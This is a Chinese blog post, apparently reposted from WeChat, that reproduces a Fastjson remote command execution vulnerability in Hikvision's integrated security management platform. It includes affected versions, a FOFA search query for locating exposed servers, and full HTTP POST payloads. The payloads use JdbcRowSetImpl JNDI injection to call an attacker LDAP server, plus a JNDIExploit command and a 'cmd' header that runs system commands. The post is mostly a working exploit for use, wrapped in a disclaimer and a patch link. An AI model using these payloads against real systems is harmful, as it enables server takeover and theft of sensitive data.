【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

2023年7月25日14:58:45评论373 views字数 2198阅读7分19秒阅读模式

免责声明

月落星沉研究室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他违法行为！！！

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

海康威视综合安防管理平台存在Fastjson远程命令执行漏洞，攻击者可通过构造恶意Payload执行并获取服务器系统权限以及敏感数据信息。

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

V2.0.0 <= iVMS-8700 <= V2.9.2 V1.0.0 <= iSecure Center <= V1.7.0

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

访问漏洞环境

FOFA: app=“HIKVISION-综合安防管理平台”

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

2.对漏洞进行复现

漏洞数据包如下：

Poc （POST）

POST /bic/ssoService/v1/applyCT HTTP/1.1Host: 127.0.0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteSec-Fetch-User: ?1Te: trailersContent-Type: application/jsonContent-Length: 204
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://kjvqweuoav.dnstunnel.run","autoCommit":true},"hfe4zyyzldp":"="}

首先先测试下ldap执行dnslog能否回显，如果能够收到请求，大概率是存在命令执行漏洞的。

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

确定dnslog能收到请求后，可进一步的利用，使用 JNDIExploit-1.3-SNAPSHOT.jar 工具执行如下命令

工具下载地址: 前往下载

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i VPSip

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

然后在Burp的请求数据包头部加上字段 cmd: whoami 这里cmd可执行系统命令，下方payload中ldap改成你的VPSip/Basic/TomcatEcho，如下数据包：

POST /bic/ssoService/v1/applyCT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Connection: keep-aliveHost: 127.0.0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Dnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteSec-Fetch-User: ?1Te: trailersContent-Type: application/jsoncmd: whoamiContent-Length: 215{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

Burp放包并执行【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/

本文由月落星沉团队编写，欢迎各位网安工程师加入月落安全研究实验室，一起学习交流讨论！群聊已满的添加Vx：linjialelovejesus，备注进群。（已加入一二三四五六群的无需重复加群）

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

原文始发于微信公众号（月落安全）：【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

人工智能硬件安全白皮书 - DUEROS百度安全

漏洞挖掘 | 某学工平台越权

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

owasp大模型应用威胁视图理解大模型应用目前所面临的主要安全威胁

新一代供应链安全攻击面

《生成式人工智能数据应用合规指南》正式发布，5月1日实施

发表评论

在线咨询

微信